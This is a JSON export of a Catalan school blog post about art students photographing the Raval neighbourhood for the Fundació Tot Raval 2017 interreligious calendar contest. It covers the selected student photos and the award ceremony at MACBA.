{"id":2554,"date":"2016-11-24T19:00:46","date_gmt":"2016-11-24T18:00:46","guid":{"rendered":"http:\/\/agora.xtec.cat\/iesconselldecent\/?p=2554"},"modified":"2018-05-06T07:14:39","modified_gmt":"2018-05-06T05:14:39","slug":"calendari-interreligios-2017-del-raval","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/","title":{"rendered":"Calendari Interreligi\u00f3s del Raval 2017"},"content":{"rendered":"<p style=\"text-align: left;\">Helena, Marta i Francesc ___\u00a0[ 1r Batx. Art\u00edstic ]<\/p>\n<p style=\"text-align: left;\">Tot just despr\u00e9s de comen\u00e7ar l&#8217;institut, l&#8217;alumnat de 1r de Batx. Art\u00edstic vam passejar pel Raval per tal de retratar les millors imatges del barri i transmeten aix\u00ed l&#8217;energia que hi ha. El concurs fotogr\u00e0fic del nou calendari interreligi\u00f3s 2017 en va ser l&#8217;excusa i l&#8217;enc\u00e0rrec. Les instruccions van ser comentades per la Carolina de la <a href=\"http:\/\/www.totraval.org\/ca\" target=\"_blank\">Fundaci\u00f3 Tot Raval<\/a> via skype, com es pot veure en les imatges inferiors.<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc_1508\/\" rel=\"attachment wp-att-2600\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2600\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1508-300x200.jpg\" alt=\"dsc_1508\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1508-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1508-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1508-1024x682.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1508.jpg 1181w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc_1509\/\" rel=\"attachment wp-att-2599\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2599\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1509-300x200.jpg\" alt=\"dsc_1509\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1509-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1509-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1509-1024x683.jpg 1024w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1509.jpg 1415w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">Aix\u00ed que, en hores de fora l&#8217;horari lectiu,\u00a0alguns i algunes ens vam ajuntar per fer l\u2019activitat i aprofitar per con\u00e8ixe&#8217;ns millor i con\u00e8ixer el Raval. \u00a0Al principi va ser complicat, ja que tothom feia pr\u00e0cticament les mateixes fotos i no hi havia cap factor d&#8217;originalitat, perque \u00e9rem molts en un mateix lloc, per\u00f2 despr\u00e9s, vam saber respectar els angles i posicions de cadasc\u00fa i van anar sortint imatges interessants.<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc_1516\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2591 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1516-300x200.jpg\" alt=\"dsc_1516\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1516-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1516-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC_1516.jpg 787w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/marta-subirachs-01-2\/\" rel=\"attachment wp-att-2606\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2606 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-01-1-300x200.jpg\" alt=\"marta-subirachs-01\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-01-1-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-01-1-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-01-1.jpg 984w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/noemilopez03\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2584\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Noemilopez03-300x195.png\" alt=\"noemilopez03\" width=\"308\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Noemilopez03-300x195.png 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Noemilopez03.png 567w\" sizes=\"auto, (max-width: 308px) 100vw, 308px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/sara-01\/\" rel=\"attachment wp-att-2588\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2588\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-01-225x300.jpg\" alt=\"sara-01\" width=\"225\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-01-225x300.jpg 225w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-01.jpg 709w\" sizes=\"auto, (max-width: 225px) 100vw, 225px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/img_20160919_073244\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2593\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20160919_073244-300x284.jpg\" alt=\"img_20160919_073244\" width=\"317\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20160919_073244-300x284.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/IMG_20160919_073244.jpg 709w\" sizes=\"auto, (max-width: 317px) 100vw, 317px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/laura-reyes-05\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2587 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-05-200x300.jpg\" alt=\"laura-reyes-05\" width=\"200\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-05-200x300.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-05.jpg 630w\" sizes=\"auto, (max-width: 200px) 100vw, 200px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/marta-subirachs-03\/\" rel=\"attachment wp-att-2586\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2596\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-03-300x225.jpg\" alt=\"sara-03\" width=\"266\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-03-300x225.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-03-768x577.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-03-200x150.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Sara-03.jpg 787w\" sizes=\"auto, (max-width: 266px) 100vw, 266px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2590\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-1-300x199.jpg\" alt=\"esperancia-saintelmy-1\" width=\"300\" height=\"199\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-1-300x199.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-1-768x510.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-1.jpg 945w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2586\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-03-300x200.jpg\" alt=\"marta-subirachs-03\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-03-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-03-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marta-Subirachs-03.jpg 945w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/maria-gutierrez-01\/\" rel=\"attachment wp-att-2589\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2589\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Maria-Guti\u00e9rrez-01-300x200.jpg\" alt=\"maria-gutierrez-01\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Maria-Guti\u00e9rrez-01-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Maria-Guti\u00e9rrez-01-768x512.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Maria-Guti\u00e9rrez-01.jpg 945w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc_1516\/\" rel=\"attachment wp-att-2591\">\u00a0<\/a><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/esperancia-saintelmy\/\" rel=\"attachment wp-att-2598\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2598\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-300x211.jpg\" alt=\"esperancia-saintelmy\" width=\"284\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-300x211.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy-768x540.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Esperancia-Saintelmy.jpg 945w\" sizes=\"auto, (max-width: 284px) 100vw, 284px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/juliacabrera04-jpg\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2594 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/J\u00faliaCabrera04.jpg-300x200.jpg\" alt=\"juliacabrera04-jpg\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/J\u00faliaCabrera04.jpg-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/J\u00faliaCabrera04.jpg.jpg 709w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">Un cop a classe, amb el professor Francesc, s&#8217;han comentat totes les imatges debatent els per\u00f2s i contres i exaltant els factors m\u00e9s art\u00edstics i vitals. Els resultats d\u2019aquestes fotografies han sigut tot un \u00e8xit. Hem fet un recull d\u2019algunes fotografies del Raval, esperem que us agradin.<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/andrea-bellosta-04\/\" rel=\"attachment wp-att-2576\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2576\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Andrea-Bellosta-04.jpg\" alt=\"andrea-bellosta-04\" width=\"333\" height=\"500\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Andrea-Bellosta-04.jpg 800w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Andrea-Bellosta-04-200x300.jpg 200w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Andrea-Bellosta-04-768x1155.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Andrea-Bellosta-04-681x1024.jpg 681w\" sizes=\"auto, (max-width: 333px) 100vw, 333px\" \/><\/a>\u00a0\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/marcela-cruz-tamara1\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2581\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marcela-Cruz-T\u00e1mara1.jpg\" alt=\"marcela-cruz-tamara1\" width=\"508\" height=\"500\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marcela-Cruz-T\u00e1mara1.jpg 720w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Marcela-Cruz-T\u00e1mara1-300x295.jpg 300w\" sizes=\"auto, (max-width: 508px) 100vw, 508px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/laura-reyes-01\/\" rel=\"attachment wp-att-2601\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2601\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-01.jpg\" alt=\"laura-reyes-01\" width=\"850\" height=\"545\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-01.jpg 984w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-01-300x192.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/Laura-Reyes-01-768x492.jpg 768w\" sizes=\"auto, (max-width: 850px) 100vw, 850px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">\u00a0La Fundaci\u00f3 Tot Raval que ha organitzat el concurs fotogr\u00e0fic, va seleccionar les tres\u00a0imatges superiors fetes per les alumnes:\u00a0Andrea Bellosta, Marcela Cruz i Laura Reyes respectivament ordenades, per il\u00b7lustrar diferents mesos del calendari.\u00a0El dijous 24 de novembre es van entregar els guardons a les seleccionades i es va presentar el <a href=\"http:\/\/www.totraval.org\/ca\/noticies\/calendari-de-celebracions-del-raval-2017\" target=\"_blank\">calendari interreligi\u00f3s del Raval 2017<\/a> davant el MACBA. <a href=\"http:\/\/www.totraval.org\/sites\/default\/files\/calendari_raval_2017_original_digital.pdf\" target=\"_blank\">Aqu\u00ed us podeu descarregar<\/a> el calendari en PDF.<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03801\/\" rel=\"attachment wp-att-2562\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2562\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03801-300x200.jpg\" alt=\"dsc03801\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03801-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03801-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03801.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03804\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2563 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03804-300x200.jpg\" alt=\"dsc03804\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03804-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03804-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03804.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a>\u00a0<a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03796\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2561 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03796-300x200.jpg\" alt=\"dsc03796\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03796-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03796-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03796.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03833\/\" rel=\"attachment wp-att-2564\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2571\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03860.jpg\" alt=\"dsc03860\" width=\"326\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03860.jpg 557w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03860-300x276.jpg 300w\" sizes=\"auto, (max-width: 326px) 100vw, 326px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2564\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03833.jpg\" alt=\"dsc03833\" width=\"450\" height=\"300\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03833.jpg 938w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03833-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03833-768x513.jpg 768w\" sizes=\"auto, (max-width: 450px) 100vw, 450px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03844\/\" rel=\"attachment wp-att-2566\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2566\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03844.jpg\" alt=\"dsc03844\" width=\"906\" height=\"605\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03844.jpg 938w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03844-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03844-768x513.jpg 768w\" sizes=\"auto, (max-width: 906px) 100vw, 906px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">L&#8217;acte va estar format per diversos discursos, un d&#8217;ells pel director de la Fundaci\u00f3 Tot Raval, despr\u00e9s es va procedir a l&#8217;entrega d&#8217;agra\u00efments amb uns lots individuals de &#8220;cultura&#8221;, i per acabar, un grup musical del Raval va delectar-nos amb un fant\u00e0stic concert mentre es podia degustar una exquisida xocolatada.<\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03846\/\" rel=\"attachment wp-att-2567\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2567\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03846-300x200.jpg\" alt=\"dsc03846\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03846-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03846-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03846.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03848\/\" rel=\"attachment wp-att-2568\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2568\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03848-300x200.jpg\" alt=\"dsc03848\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03848-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03848-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03848.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03872\/\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone wp-image-2572 size-medium\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03872-300x200.jpg\" alt=\"dsc03872\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03872-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03872-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03872.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: left;\"><a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03851\/\" rel=\"attachment wp-att-2569\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2565\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03840-300x200.jpg\" alt=\"dsc03840\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03840-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03840-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03840.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/>\u00a0<img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2569\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03851-300x200.jpg\" alt=\"dsc03851\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03851-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03851-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03851.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a> <a href=\"http:\/\/agora.xtec.cat\/iesconselldecent\/general\/calendari-interreligios-2017-del-raval\/attachment\/dsc03853\/\" rel=\"attachment wp-att-2570\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-medium wp-image-2570\" src=\"http:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03853-300x200.jpg\" alt=\"dsc03853\" width=\"300\" height=\"200\" srcset=\"https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03853-300x200.jpg 300w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03853-768x513.jpg 768w, https:\/\/agora.xtec.cat\/iesconselldecent\/wp-content\/uploads\/usu708\/2016\/11\/DSC03853.jpg 938w\" sizes=\"auto, (max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<p style=\"text-align: left;\">El twitter del centre tamb\u00e9 va fer menci\u00f3 dels citats reconeixements:<\/p>\n<blockquote class=\"twitter-tweet\" data-width=\"500\" 